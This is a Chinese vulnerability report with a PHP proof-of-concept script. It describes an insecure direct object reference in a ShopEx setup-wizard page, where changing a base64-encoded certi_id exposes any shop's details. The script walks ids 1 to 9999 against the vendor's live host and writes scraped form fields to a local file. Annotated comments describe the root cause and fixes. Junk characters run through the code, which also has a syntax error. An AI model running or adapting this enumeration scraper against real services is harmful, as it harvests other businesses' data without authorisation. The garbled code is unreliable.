|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
<?php
6 H( d- C+ V$ L# I, j; ]. [, v/ T3 @3 z
// PoC driver: tries certi_id 1..9999 in turn. Only this integer changes between
// requests; the page text states that any value is accepted, which is the
// broken-access-control issue being demonstrated. From the server's side a
// single client walking sequential ids at this rate is the signal to alert on.
for ($i=1; $i < 10000; $i++) { // enumerate candidate ids
9 f, f7 T: A; u* P- y$ K
ShowshopExD($i);4 J- E# h' ^4 F7 \6 p" ~+ k
! K5 j5 U8 Z5 e: F2 o" g
}
; C8 c1 Z$ `# u# J+ }3 I* v# E: `3 g/ P# c
/**
 * Fetch the ShopEx wizard page for one candidate certi_id and, when the page
 * reflects the refer value back, print and record every <input type="text">
 * name/value pair found in it.
 *
 * @param mixed $cid candidate id; run through intval() before it is placed in
 *                   the JSON, so non-numeric input degrades to 0
 * @return void  output goes to stdout and is appended to c:/shopEx.txt
 *
 * Root cause this exercises (see the page text): the shop is selected solely
 * by a client-supplied, sequential integer inside plain base64 JSON — no
 * signature, nonce or session binding is present in the request built here.
 * Server-side remediation is to take the id from the authenticated session
 * rather than from the refer parameter, or at least to MAC the refer payload
 * and reject requests whose MAC does not verify, plus rate-limiting so that
 * sequential scans stand out in access logs.
 */
function ShowshopExD($cid) {
: @- h. Z z* e. Z0 E% E7 d
// Endpoint from the page; refer is the only query parameter this script sends.
4 T. J& h5 I2 f$ k, Z% `: _$ A $url='http://guide.ecos.shopex.cn/step2.php';
. _8 y' z+ w" g" z# U9 C- A! k
// Same JSON shape as the decoded refer shown on the page; only certi_id varies,
// callback_url is a fixed dummy. Note it is plain base64 — nothing to verify.
; {3 v% T. n! R2 l2 Y $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');; p% x# r: i$ k# ]7 A+ ~, O( h" B
3 s+ e- c0 k: ~% N, q# Q0 V
$url = $url.'?refer='.$refer;
O4 S+ H3 t3 L( v, E. r
, T/ i; Y. H/ L $ch = curl_init($url);8 V0 S5 |2 Y0 K6 A
) Y ?1 J' n F0 ?7 v5 `5 B ]
// Return the body as a string instead of printing it directly.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;' }6 e1 d9 s' t' J; L
0 Q$ t+ l& T1 g) J0 { curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
w# N; S; b3 k6 [9 @) K: [4 P& L! V& c" ^) b/ }& N
// No transfer check: curl_exec() yields false on failure, and the matching
// below then simply finds nothing for this id.
$result = curl_exec($ch);
6 m A# v0 r: o0 s" `2 N. D7 m% K7 g8 c8 M# ^& `
// Re-encode UTF-8 -> GB2312 for the console; $refer is base64 (ASCII), so the
// substring test below is unaffected by the conversion.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");- r& I t* a8 N: [
) y4 P; Q6 D) T! _ _. C2 @+ w' w
// A reflected refer value is taken as "this id resolved to a shop". strpos()
// is used as a boolean here, so a match at offset 0 would be treated as a miss
// (`!== false` is the safe form). The extra ')' at the end of the line looks
// like paste damage.
if(strpos($result,$refer))) I. ^* g2 g2 Y
8 r! q$ [; o( Y( m
{6 n- Y" N) D- D7 a8 Z5 ?- O
, `$ ~) c1 a. r" k# `$ z6 `
// Append mode; the fopen() result is never checked.
$fp = fopen("c:/shopEx.txt",'ab'); // save to file
" M! [- M( D7 D7 `# \
// Every self-closing text input; group 1 holds its attribute string.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);9 X, W b% w3 ~# Y* m# o
6 Q4 |8 l+ g; ~. }- ^0 P, M
foreach ($value[1] as $key) { ~3 r) G _/ ]$ f7 m& ~; o1 @
/ T" [8 G* e2 T# w& F$ k
// Split the attribute string into name (group 1) and value (group 3). If it
// does not match, $res[1][0] is undefined and PHP raises a notice below.
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);$ F6 l) Y, k; ?2 w' ~, ~- q$ |# @
// As pasted, the next line starts with '#', so PHP treats it as a comment and
// this echo never runs; the same string is still written by fwrite() below.
# |" k( `; v& x% Q. U echo $res[1][0].':'.$res[3][0]."\r\n";: ^9 N, [- ~7 B& Q' a& \4 K
1 N4 T2 J6 c- M, [8 I% {
$col =$res[1][0].':'.$res[3][0]."\r\n"; 5 Y6 H6 q, r( G' h
, |% M, {$ f) t+ ^: _
fwrite($fp, $col, strlen($col)); 3 Y4 h& S& Q3 k+ t- o* \5 _; Y( I
8 N$ I; y2 K& P5 R4 |1 u
}
+ `6 }- X u+ k/ @0 p# u
// Separator between shops on stdout.
. `+ A" r' c e' I echo '--------------------------------'."\r\n";
( M' `) G- a0 _. u. c( q1 ^
" v7 G6 I+ W& i+ N fclose($fp); 6 u, _$ n0 o; W) E" i
( X/ f1 P' p6 s5 S' Z! Q- m2 ?+ R. M
}
$ N* M3 X4 R& C5 L3 R2 [
// Push buffered output out now; the curl handle is released on every call,
// matched or not.
. S( O5 ?. o. |; v- z: {2 U; Y+ Z flush();% q D8 s: c2 v/ n# i
6 u6 y8 g, O9 l5 x; g7 U$ c curl_close($ch);6 a- y7 Q" {; F+ h; U8 D4 d
/ s8 ^& |3 v- I: U: o4 y6 Q
}
4 S% K& O9 e- H9 f; i1 G9 N" a- i( w, E
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式
|
|